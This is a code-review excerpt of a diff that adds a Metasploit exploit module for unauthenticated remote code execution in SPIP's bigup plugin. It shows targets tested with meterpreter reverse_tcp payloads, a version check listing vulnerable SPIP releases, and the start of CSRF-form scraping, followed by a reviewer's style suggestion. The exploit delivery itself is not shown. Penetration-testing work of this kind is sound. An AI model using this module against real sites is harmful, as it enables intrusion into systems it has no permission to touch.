modules/exploits/multi/http/spip_bigup_unauth_rce.rb

```diff
@@ -0,0 +1,199 @@
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-09-06',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('FORM_PAGE', ['false', 'A page with a form.', 'Auto'])
+      ]
+    )
+  end
+
+  def check
+    rversion = spip_version || spip_plugin_version('spip')
+    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
+
+    print_status("SPIP Version detected: #{rversion}")
+
+    vulnerable_ranges = [
+      { start: Rex::Version.new('4.0.0'), end: Rex::Version.new('4.1.17') },
+      { start: Rex::Version.new('4.2.0'), end: Rex::Version.new('4.2.15') },
+      { start: Rex::Version.new('4.3.0'), end: Rex::Version.new('4.3.1') }
+    ]
+
+    is_vulnerable = vulnerable_ranges.any? { |range| rversion.between?(range[:start], range[:end]) }
+
+    unless is_vulnerable
+      return CheckCode::Safe("The detected SPIP version (#{rversion}) is not vulnerable.")
+    end
+
+    print_good("SPIP version #{rversion} is vulnerable.")
+    plugin_version = spip_plugin_version('bigup')
+
+    unless plugin_version
+      print_warning('Could not determine the version of the bigup plugin.')
+      return CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
+    end
+
+    print_status("Bigup plugin version detected: #{plugin_version}")
+    if plugin_version < Rex::Version.new('3.2.12')
+      return CheckCode::Appears("Both the detected SPIP version (#{rversion}) and bigup version (#{plugin_version}) are vulnerable.")
+    end
+
+    CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
+  end
+
+  # This function tests several pages to find a form with a valid CSRF token and its corresponding action.
+  # It allows the user to specify a URL via the FORM_PAGE option (e.g., spip.php?article1).
+  # We need to check multiple pages because the configuration of SPIP can vary.
+  def get_form_data
+    pages = %w[login spip_pass contact]
+
+    if datastore['FORM_PAGE']&.downcase != 'auto'
+      pages = [datastore['FORM_PAGE']]
+    end
+
+    pages.each do |page|
+      url = normalize_uri(target_uri.path, page.start_with?('/') ? page : "spip.php?page=#{page}")
+      res = send_request_cgi('method' => 'GET', 'uri' => url)
+
+      next unless res&.code == 200
+
+      doc = Nokogiri::HTML(res.body)
```

Comment:
You can use `res.get_html_document` instead, it will return a Nokogiri document from the response body:
```suggestion
      doc = res.get_html_document
```